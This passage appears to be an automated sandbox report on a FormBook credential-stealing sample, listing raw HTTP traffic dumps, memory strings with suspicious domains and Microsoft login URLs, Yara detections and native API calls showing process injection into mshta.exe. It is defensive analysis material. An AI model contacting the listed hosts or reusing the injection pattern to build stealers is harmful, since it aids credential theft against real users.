2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~\|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 837Connection: closeDate: Fri, 07 Mar 2025 22:01:11 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 4c 65 20 66 69 63 68 69 65 72 20 72 65 71 75 69 73 20 6e 27 61 20 70 61 73 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 74 72 6f 75 76 26 65 61 63 75 74 65 3b 2e 0a 49 6c 20 70 65 75 74 20 73 27 61 67 69 72 20 64 27 75 6e 65 20 65 72 72 65 75 72 20 74 65 63 68 6e 69 71 75 65 2e 20 56 65 75 69 6c 6c 65 7a 20 72 26 65 61 63 75 74 65 3b 65 73 73 61 79 65 72 20 75 6c 74 26 65 61 63 75 74 65 3b 72 69 65 75 72 65 6d 65 6e 74 2e 20 53 69 20 76 6f 75 73 20 6e 65 20 70 6f 75 76 65 7a 20 70 61 73 20 61 63 63 26 65 61 63 75 74 65 3b 64 65 72 20 61 75 20 66 69 63 68 69 65 72 20 61 70 72 26 65 67 72 61 76 65 3b 73 20 70 6c 75 73 69 65 75 72 73 20 74 65 6e 74 61 74 69 76 65 73 2c 20 63 65 6c 61 20 73 69 67 6e 69 66 69 65 20 71 75 27 69 6c 20 61 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 73 75 70 70 72 69 6d 26 65 61 63 75 74 65 3b 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta c
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 22:01:16 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XjdX8gSw9%2FOotVpl86plnTVce65O44vrMjh1Pap1bpiha%2BSPS4xLPadK276%2FXZlm8%2B%2B4E%2Bvy136qTOV5IS4cSAjKGZ8ru3pVvgBNHwfASPJnEKa3pE3GOx5gv0%2F24w28F5JXCU0uhBWx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cd5ed6cba272b9-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1764&min_rtt=1764&rtt_var=882&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=793&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b 03 31 14 84 ef f9 15 cf de dd b7 95 1e 3c 3c 02 da dd 62 61 ad 8b a6 07 8f d1 bc 92 42 9b c4 e4 d5 e0 bf 97 dd 22 78 9d f9 66 98 a1 9b ee 65 6d de c7 1e 9e cc f3 00 e3 fe 71 d8 ae 61 71 8b b8 ed cd 06 b1 33 dd d5 b9 6b 5a c4 7e b7 d0 8a bc 9c 4f 9a 3c 5b a7 15 c9 51 4e ac 57 ed 0a 76 51 60 13 2f c1 11 5e 45 45 38 43 f4 11 dd cf 94 5b ea 7f 8c 5f 6a 45 49 1b cf 90 f9 eb c2 45 d8 c1 fe 75 80 6a 0b 84 28 70 98 38 88 01 c4 1f 0b 14 ce df 9c 1b c2 34 35 65 ad c8 3a 97 b9 14 fd 90 ec a7 67 78 9b 01 b0 02 b5 d6 26 70 b5 41 7c 4c 9c 4b 6c 8a 8f 09 c6 98 05 ee 5b c2 bf a0 22 9c 97 11 ce 8f 7e 01 00 00 ff ff 0d 0a Data Ascii: d8LAK1<<baB"xfemqaq3kZ~O<[QNWvQ`/^EE8C[_jEIEuj(p845e:gx&pA\|LKl["~
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 22:01:19 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BL7rMPSkQKOlF%2F5Ob5tz9SArufXk3d5jLRsLuUg8ZlINe8FT7Tfw0%2FfFZQKaWq14Pv8iOC2G4Ult8sH6DaM5uWytDC3vmIEkSZTeBSy2yldwbR6gLwQ4b09jVU%2BktJw0lfNr8MySjC9l"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cd5ee6deebc327-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1588&rtt_var=794&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=817&delivery_rate=0&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b 03 31 14 84 ef f9 15 cf de dd b7 95 1e 3c 3c 02 da dd 62 61 ad 8b a6 07 8f d1 bc 92 42 9b c4 e4 d5 e0 bf 97 dd 22 78 9d f9 66 98 a1 9b ee 65 6d de c7 1e 9e cc f3 00 e3 fe 71 d8 ae 61 71 8b b8 ed cd 06 b1 33 dd d5 b9 6b 5a c4 7e b7 d0 8a bc 9c 4f 9a 3c 5b a7 15 c9 51 4e ac 57 ed 0a 76 51 60 13 2f c1 11 5e 45 45 38 43 f4 11 dd cf 94 5b ea 7f 8c 5f 6a 45 49 1b cf 90 f9 eb c2 45 d8 c1 fe 75 80 6a 0b 84 28 70 98 38 88 01 c4 1f 0b 14 ce df 9c 1b c2 34 35 65 ad c8 3a 97 b9 14 fd 90 ec a7 67 78 9b 01 b0 02 b5 d6 26 70 b5 41 7c 4c 9c 4b 6c 8a 8f 09 c6 98 05 ee 5b c2 bf a0 22 9c 97 11 ce 8f 7e 01 00 00 ff ff e3 02 00 fa 01 eb 10 0c 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e3LAK1<<baB"xfemqaq3kZ~O<[QNWvQ`/^EE8C[_jEIEuj(p845e:gx&pA\|LKl["~0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 22:01:21 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MmzGoAtKnnUl27ZS58%2B7sRJgDbTyPLj6s9geh%2FBzwwiC%2BzmZNSLRKjUF6ky1t0%2B6jF4au79S5XntfLvFyrStMMREvxCx8VxvN5kHJcwLuBpwMsH%2BV69bl%2B9nDQen7qLqBKP3uNvwfbSD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cd5ef6bc0041a6-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1573&rtt_var=786&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=977&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b 03 31 14 84 ef f9 15 cf de dd b7 95 1e 3c 3c 02 da dd 62 61 ad 8b a6 07 8f d1 bc 92 42 9b c4 e4 d5 e0 bf 97 dd 22 78 9d f9 66 98 a1 9b ee 65 6d de c7 1e 9e cc f3 00 e3 fe 71 d8 ae 61 71 8b b8 ed cd 06 b1 33 dd d5 b9 6b 5a c4 7e b7 d0 8a bc 9c 4f 9a 3c 5b a7 15 c9 51 4e ac 57 ed 0a 76 51 60 13 2f c1 11 5e 45 45 38 43 f4 11 dd cf 94 5b ea 7f 8c 5f 6a 45 49 1b cf 90 f9 eb c2 45 d8 c1 fe 75 80 6a 0b 84 28 70 98 38 88 01 c4 1f 0b 14 ce df 9c 1b c2 34 35 65 ad c8 3a 97 b9 14 fd 90 ec a7 67 78 9b 01 b0 02 b5 d6 26 70 b5 41 7c 4c 9c 4b 6c 8a 8f 09 c6 98 05 ee 5b c2 bf a0 22 9c 97 11 ce 8f 7e 01 00 00 ff ff e3 02 00 fa 01 eb 10 0c 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e3LAK1<<baB"xfemqaq3kZ~O<[QNWvQ`/^EE8C[_jEIEuj(p845e:gx&pA\|LKl["~0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 22:01:24 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QvuFn13BB381YQQ4AolgtIcWvNkjxukq6EB4ulEslU%2BEnl7vKANPFq4lLV%2B5Dsn9UGB%2BIa%2FXT%2BqslP6jxOaK5tA6xH9tuL9bWs8m9Qfctp0krE1hjfv3WitrRS96pBqJRnIm63aVtl7%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cd5f069dad4344-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1664&rtt_var=832&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=524&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 30 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 65 77 61 6e 74 68 6f 70 65 72 73 6f 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.newanthoperso.shop Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 22:01:57 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0

Source: MmF9tcIj1J.exe	String found in binary or memory: http://tempuri.org/Database1DataSet.xsd
Source: lq9nGfkZ7JbZdUv7.exe, 0000000A.00000002.3695080703.0000000005263000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.btbjpu.info
Source: lq9nGfkZ7JbZdUv7.exe, 0000000A.00000002.3695080703.0000000005263000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.btbjpu.info/w5wx/
Source: mshta.exe, 00000009.00000003.1694672948.0000000008168000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: mshta.exe, 00000009.00000003.1694672948.0000000008168000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: mshta.exe, 00000009.00000003.1694672948.0000000008168000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: mshta.exe, 00000009.00000003.1694672948.0000000008168000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: mshta.exe, 00000009.00000003.1694672948.0000000008168000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: mshta.exe, 00000009.00000003.1694672948.0000000008168000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
Source: mshta.exe, 00000009.00000003.1694672948.0000000008168000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: mshta.exe, 00000009.00000002.3693881397.000000000441A000.00000004.10000000.00040000.00000000.sdmp, lq9nGfkZ7JbZdUv7.exe, 0000000A.00000002.3693055409.000000000367A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fburl.com
Source: mshta.exe, 00000009.00000002.3693881397.000000000441A000.00000004.10000000.00040000.00000000.sdmp, mshta.exe, 00000009.00000002.3695864874.00000000065F0000.00000004.00000800.00020000.00000000.sdmp, lq9nGfkZ7JbZdUv7.exe, 0000000A.00000002.3693055409.000000000367A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: mshta.exe, 00000009.00000003.1694672948.0000000008168000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: mshta.exe, 00000009.00000002.3691268424.0000000002D8A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_a
Source: mshta.exe, 00000009.00000002.3691268424.0000000002D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: mshta.exe, 00000009.00000002.3691268424.0000000002D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: mshta.exe, 00000009.00000003.1690137162.000000000814D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: mshta.exe, 00000009.00000002.3691268424.0000000002D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: mshta.exe, 00000009.00000002.3691268424.0000000002D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: mshta.exe, 00000009.00000002.3691268424.0000000002D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: mshta.exe, 00000009.00000002.3691268424.0000000002D62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: mshta.exe, 00000009.00000002.3693881397.000000000441A000.00000004.10000000.00040000.00000000.sdmp, lq9nGfkZ7JbZdUv7.exe, 0000000A.00000002.3693055409.000000000367A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://optimize.google.com
Source: mshta.exe, 00000009.00000002.3693881397.000000000441A000.00000004.10000000.00040000.00000000.sdmp, lq9nGfkZ7JbZdUv7.exe, 0000000A.00000002.3693055409.000000000367A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://td.doubleclick.net
Source: mshta.exe, 00000009.00000002.3693881397.000000000441A000.00000004.10000000.00040000.00000000.sdmp, mshta.exe, 00000009.00000002.3695864874.00000000065F0000.00000004.00000800.00020000.00000000.sdmp, lq9nGfkZ7JbZdUv7.exe, 0000000A.00000002.3693055409.000000000367A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://w.ladicdn.com/v2/source/html5shiv.min.js?v=1569310222693
Source: mshta.exe, 00000009.00000002.3693881397.000000000441A000.00000004.10000000.00040000.00000000.sdmp, mshta.exe, 00000009.00000002.3695864874.00000000065F0000.00000004.00000800.00020000.00000000.sdmp, lq9nGfkZ7JbZdUv7.exe, 0000000A.00000002.3693055409.000000000367A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://w.ladicdn.com/v2/source/respond.min.js?v=1569310222693
Source: mshta.exe, 00000009.00000003.1694672948.0000000008168000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: mshta.exe, 00000009.00000002.3693881397.000000000441A000.00000004.10000000.00040000.00000000.sdmp, lq9nGfkZ7JbZdUv7.exe, 0000000A.00000002.3693055409.000000000367A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: mshta.exe, 00000009.00000003.1694672948.0000000008168000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: mshta.exe, 00000009.00000002.3693881397.000000000441A000.00000004.10000000.00040000.00000000.sdmp, lq9nGfkZ7JbZdUv7.exe, 0000000A.00000002.3693055409.000000000367A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googleanalytics.com
Source: mshta.exe, 00000009.00000002.3693881397.000000000441A000.00000004.10000000.00040000.00000000.sdmp, lq9nGfkZ7JbZdUv7.exe, 0000000A.00000002.3693055409.000000000367A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.googleoptimize.com

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 4.2.MmF9tcIj1J.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MmF9tcIj1J.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3692877173.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3695080703.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3690653132.0000000000A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3692941025.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1508811235.00000000017E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3692821369.0000000003970000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1506820467.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1509021015.0000000002D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0042C6D3 NtClose,	4_2_0042C6D3
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2B60 NtClose,LdrInitializeThunk,	4_2_014B2B60
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_014B2DF0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_014B2C70
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B35C0 NtCreateMutant,LdrInitializeThunk,	4_2_014B35C0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B4340 NtSetContextThread,	4_2_014B4340
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B4650 NtSuspendThread,	4_2_014B4650
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2BE0 NtQueryValueKey,	4_2_014B2BE0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2BF0 NtAllocateVirtualMemory,	4_2_014B2BF0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2B80 NtQueryInformationFile,	4_2_014B2B80
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2BA0 NtEnumerateValueKey,	4_2_014B2BA0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2AD0 NtReadFile,	4_2_014B2AD0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2AF0 NtWriteFile,	4_2_014B2AF0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2AB0 NtWaitForSingleObject,	4_2_014B2AB0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2D00 NtSetInformationFile,	4_2_014B2D00
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2D10 NtMapViewOfSection,	4_2_014B2D10
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2D30 NtUnmapViewOfSection,	4_2_014B2D30
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2DD0 NtDelayExecution,	4_2_014B2DD0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2DB0 NtEnumerateKey,	4_2_014B2DB0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2C60 NtCreateKey,	4_2_014B2C60
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2C00 NtQueryInformationProcess,	4_2_014B2C00
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2CC0 NtQueryVirtualMemory,	4_2_014B2CC0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2CF0 NtOpenProcess,	4_2_014B2CF0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2CA0 NtQueryInformationToken,	4_2_014B2CA0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2F60 NtCreateProcessEx,	4_2_014B2F60
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2F30 NtCreateSection,	4_2_014B2F30
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2FE0 NtCreateFile,	4_2_014B2FE0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2F90 NtProtectVirtualMemory,	4_2_014B2F90
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2FA0 NtQuerySection,	4_2_014B2FA0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2FB0 NtResumeThread,	4_2_014B2FB0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2E30 NtWriteVirtualMemory,	4_2_014B2E30
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2EE0 NtQueueApcThread,	4_2_014B2EE0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2E80 NtReadVirtualMemory,	4_2_014B2E80
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B2EA0 NtAdjustPrivilegesToken,	4_2_014B2EA0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B3010 NtOpenDirectoryObject,	4_2_014B3010
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B3090 NtSetValueKey,	4_2_014B3090
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B39B0 NtGetContextThread,	4_2_014B39B0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B3D70 NtOpenThread,	4_2_014B3D70
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B3D10 NtOpenProcessToken,	4_2_014B3D10
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03464340 NtSetContextThread,LdrInitializeThunk,	9_2_03464340
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03464650 NtSuspendThread,LdrInitializeThunk,	9_2_03464650
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462B60 NtClose,LdrInitializeThunk,	9_2_03462B60
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462BE0 NtQueryValueKey,LdrInitializeThunk,	9_2_03462BE0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_03462BF0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462BA0 NtEnumerateValueKey,LdrInitializeThunk,	9_2_03462BA0
